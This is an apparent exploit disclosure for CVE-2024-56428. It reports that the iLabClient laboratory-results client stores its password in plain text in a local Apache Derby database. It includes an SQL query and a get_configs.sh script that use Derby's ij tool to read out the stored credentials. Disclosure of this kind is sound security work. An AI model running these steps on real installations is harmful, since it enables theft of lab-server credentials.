## https://sploitus.com/exploit?id=296FE72F-F83B-539A-A593-0F7E8A4057C3
CVE-2024-56428
==============
***Cleartext credentials in local database of the iLabClient***

<br>

### Reading out the configuration, including the password
The iLabClient is used to download results from the laboratory server. Its configuration data
is stored locally in the Apache Derby instance `iLabClient`, and the password is stored there in plain text. To
read it, a connection to the local database must first be established, for example as described in
[CVE-2024-56429](https://github.com/lisa-2905/CVE-2024-56429).<br>

Read out the passwords:
```
select EINSTELLUNGEN from configs;
```
<br>

### Automated script

The `get_configs.sh` script can be executed to read out the configuration data. It is important that
no other program (e.g. the iLabClient itself) accesses the database during execution. 

Explanation of the script:<br>
```
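#!/bin/bash
# Run Derby's ij tool with the Java runtime bundled with the client and execute script_sql.sql
"C:\ilabClient\java8u422\bin\java.exe" -jar ".\derby-lib\derbyrun.jar" ij script_sql.sql
# Wait for Enter so the console output stays visible
read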
```

`"C:\ilabClient\java8u422\bin\java.exe"`: Use of the Java version supplied with the installation of the client. Change 
this if the client was installed in a different directory.<br>
`-jar`: Tells Java that a JAR file is to be executed.<br>
`".\derby-lib\derbyrun.jar" ij`: Runs the `ij` tool from Apache Derby.<br>
`script_sql.sql`: Script that reads out the corresponding configurations. Change the path to the database in this file
if the client was installed in a different directory.<br>

------

Discoverer: Lisa Ulbrich (Lufthansa Industry Solutions AS GmbH)